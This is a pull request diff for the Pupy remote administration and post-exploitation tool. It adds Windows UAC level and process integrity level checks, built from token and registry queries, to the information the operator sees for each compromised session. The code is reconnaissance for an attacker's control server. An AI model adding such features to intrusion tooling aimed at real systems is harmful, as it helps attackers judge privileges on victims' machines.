### PR TITLE
Print UAC level and Integrity level (Windows feature)

### DIFF
--- a/pupy/modules/get_info.py
+++ b/pupy/modules/get_info.py
@@ -10,8 +10,24 @@ class GetInfo(PupyModule):
         self.arg_parser = PupyArgumentParser(prog='get_info', description=self.__doc__)
         #self.arg_parser.add_argument('arguments', nargs='+', metavar='<command>')
     def run(self, args):
+        commonKeys = ["hostname", "user", "release", "version", "os_arch", "proc_arch", "pid", "exec_path", "address", "macaddr"]
+        pupyKeys = ["transport", "launcher", "launcher_args"]
+        windKeys = ["uac_lvl","intgty_lvl"]
+        linuxKeys = []
+        macKeys = []
         infos=""
-        for k in ["hostname", "user", "release", "version", "os_arch", "pid", "exec_path", "proc_arch", "address", "macaddr", "transport", "launcher", "launcher_args"]:
+        for k in commonKeys:
+            infos+="{:<10}: {}\n".format(k,self.client.desc[k])
+        if self.client.is_windows():
+            for k in windKeys:
+                infos+="{:<10}: {}\n".format(k,self.client.desc[k])
+        elif self.client.is_linux():
+            for k in linuxKeys:
+                infos+="{:<10}: {}\n".format(k,self.client.desc[k])
+        elif self.client.is_darwin():
+            for k in macKeys:
+                infos+="{:<10}: {}\n".format(k,self.client.desc[k])
+        for k in pupyKeys:
             infos+="{:<10}: {}\n".format(k,self.client.desc[k])
         self.rawlog(infos)
 

--- a/pupy/pupylib/PupyCmd.py
+++ b/pupy/pupylib/PupyCmd.py
@@ -468,7 +468,7 @@ class PupyCmd(cmd.Cmd):
 
         elif modargs.list or not arg:
             client_list=self.pupsrv.get_clients_list()
-            self.display(PupyCmd.table_format([x.desc for x in client_list], wl=["id", "user", "hostname", "platform", "release", "os_arch","proc_arch","address"]))
+            self.display(PupyCmd.table_format([x.desc for x in client_list], wl=["id", "user", "hostname", "platform", "release", "os_arch","proc_arch","uac_lvl","address"]))
 
 
     def do_jobs(self, arg):

--- a/pupy/pupylib/PupyCmd.py
+++ b/pupy/pupylib/PupyCmd.py
@@ -468,7 +468,7 @@ class PupyCmd(cmd.Cmd):
 
         elif modargs.list or not arg:
             client_list=self.pupsrv.get_clients_list()
-            self.display(PupyCmd.table_format([x.desc for x in client_list], wl=["id", "user", "hostname", "platform", "release", "os_arch","proc_arch","uac_lvl","address"]))
+            self.display(PupyCmd.table_format([x.desc for x in client_list], wl=["id", "user", "hostname", "platform", "release", "os_arch","proc_arch","intgty_lvl","address"]))
 
 
     def do_jobs(self, arg):

--- a/pupy/pupylib/PupyServer.py
+++ b/pupy/pupylib/PupyServer.py
@@ -87,10 +87,114 @@ class PupyServer(threading.Thread):
         import sys
         import os
         import locale
-        from _winreg import *
         os_encoding = locale.getpreferredencoding() or "utf8"
+        if sys.platform == 'win32': 
+            from _winreg import *
+            import ctypes
+        
+        def get_integrity_level_win():
+          '''from http://www.programcreek.com/python/example/3211/ctypes.c_long'''
+          if sys.platform != 'win32':
+            return "N/A"
+
+          mapping = {
+            0x0000: u'Untrusted',
+            0x1000: u'Low',
+            0x2000: u'Medium',
+            0x2100: u'Medium high',
+            0x3000: u'High',
+            0x4000: u'System',
+            0x5000: u'Protected process',
+          }
+
+          BOOL = ctypes.c_long
+          DWORD = ctypes.c_ulong
+          HANDLE = ctypes.c_void_p
+          class SID_AND_ATTRIBUTES(ctypes.Structure):
+            _fields_ = [
+              ('Sid', ctypes.c_void_p),
+              ('Attributes', DWORD),
+            ]
+
+          class TOKEN_MANDATORY_LABEL(ctypes.Structure):
+            _fields_ = [
+              ('Label', SID_AND_ATTRIBUTES),
+            ]
+
+          TOKEN_READ = DWORD(0x20008)
+          TokenIntegrityLevel = ctypes.c_int(25)
+          ERROR_INSUFFICIENT_BUFFER = 122
+
+          ctypes.windll.kernel32.GetLastError.argtypes = ()
+          ctypes.windll.kernel32.GetLastError.restype = DWORD
+          ctypes.windll.kernel32.GetCurrentProcess.argtypes = ()
+          ctypes.windll.kernel32.GetCurrentProcess.restype = ctypes.c_void_p
+          ctypes.windll.advapi32.OpenProcessToken.argtypes = (
+              HANDLE, DWORD, ctypes.POINTER(HANDLE))
+          ctypes.windll.advapi32.OpenProcessToken.restype = BOOL
+          ctypes.windll.advapi32.GetTokenInformation.argtypes = (
+              HANDLE, ctypes.c_long, ctypes.c_void_p, DWORD, ctypes.POINTER(DWORD))
+          ctypes.windll.advapi32.GetTokenInformation.restype = BOOL
+          ctypes.windll.advapi32.GetSidSubAuthorityCount.argtypes = [ctypes.c_void_p]
+          ctypes.windll.advapi32.GetSidSubAuthorityCount.restype = ctypes.POINTER(
+              ctypes.c_ubyte)
+          ctypes.windll.advapi32.GetSidSubAuthority.argtypes = (ctypes.c_void_p, DWORD)
+          ctypes.windll.advapi32.GetSidSubAuthority.restype = ctypes.POINTER(DWORD)
+
+          token = ctypes.c_void_p()
+          proc_handle = ctypes.windll.kernel32.GetCurrentProcess()
+          if not ctypes.windll.advapi32.OpenProcessToken(
+              proc_handle,
+              TOKEN_READ,
+              ctypes.byref(token)):
+            logging.error('Failed to get process token')
+            return None
+          if token.value == 0:
+            logging.error('Got a NULL token')
+            return None
+          try:
+            info_size = DWORD()
+            if ctypes.windll.advapi32.GetTokenInformation(
+                token,
+                TokenIntegrityLevel,
+                ctypes.c_void_p(),
+                info_size,
+                ctypes.byref(info_size)):
+              logging.error('GetTokenInformation() failed expectation')
+              return None
+            if info_size.value == 0:
+              logging.error('GetTokenInformation() returned size 0')
+              return None
+            if ctypes.windll.kernel32.GetLastError() != ERROR_INSUFFICIENT_BUFFER:
+              logging.error(
+                  'GetTokenInformation(): Unknown error: %d',
+                  ctypes.windll.kernel32.GetLastError())
+              return None
+            token_info = TOKEN_MANDATORY_LABEL()
+            ctypes.resize(token_info, info_size.value)
+            if not ctypes.windll.advapi32.GetTokenInformation(
+                token,
+                TokenIntegrityLevel,
+                ctypes.byref(token_info),
+                info_size,
+                ctypes.byref(info_size)):
+              logging.error(
+                  'GetTokenInformation(): Unknown error with buffer size %d: %d',
+                  info_size.value,
+                  ctypes.windll.kernel32.GetLastError())
+              return None
+            p_sid_size = ctypes.windll.advapi32.GetSidSubAuthorityCount(
+                token_info.Label.Sid)
+            res = ctypes.windll.advapi32.GetSidSubAuthority(
+                token_info.Label.Sid, p_sid_size.contents.value - 1)
+            value = res.contents.value
+            return mapping.get(value) or u'0x%04x' % value
+          finally:
+            ctypes.windll.kernel32.CloseHandle(token)
 
         def getUACLevel():
+            if sys.platform != 'win32':
+                return 'N/A'
             i, consentPromptBehaviorAdmin, enableLUA, promptOnSecureDesktop = 0, None, None, None
             try:
                 Registry = ConnectRegistry(None, HKEY_LOCAL_MACHINE)
@@ -141,6 +245,8 @@ class PupyServer(threading.Thread):
             pid=None
             proc_arch=None
             proc_path=sys.executable
+            uacLevel = None
+            integrity_level_win = None
             try:
                 user=getpass.getuser().decode(encoding=os_encoding).encode("utf8")
                 if sys.platform=="win32":
@@ -190,7 +296,15 @@ class PupyServer(threading.Thread):
                 macaddr=':'.join(("%012X" % macaddr)[i:i+2] for i in range(0, 12, 2))
             except Exception:
                 pass
-            return (user, node, plat, release, version, machine, macaddr, pid, proc_arch, proc_path, getUACLevel())
+            try:
+                uacLevel = getUACLevel()
+            except Exception as e:
+                uacLevel = "?"
+            try:
+                integrity_level_win = get_integrity_level_win()
+            except Exception as e:
+                integrity_level_win = "?"
+            return (user, node, plat, release, version, machine, macaddr, pid, proc_arch, proc_path, uacLevel, integrity_level_win)
             """))
         l=conn.namespace["get_uuid"]()
         
@@ -209,6 +323,7 @@ class PupyServer(threading.Thread):
                 "macaddr" : l[6],
                 "pid" : l[7],
                 "uac_lvl" : l[10],
+                "intgty_lvl" : l[11],
                 "address" : conn._conn._config['connid'].rsplit(':',1)[0],
                 "launcher" : conn.get_infos("launcher"),
                 "launcher_args" : obtain(conn.get_infos("launcher_args")),


### PR DESCRIPTION
In output of "sessions" command, print **Integrity Level** of the current process when target is Windows.
In output of "info" command, print both **UAC level** and **Integrity level** when target is Windows.

Tested on Windows 7 (x86) [and Linux (kali) (x64)].

Sorry for all these commits: Only one commit could have been better.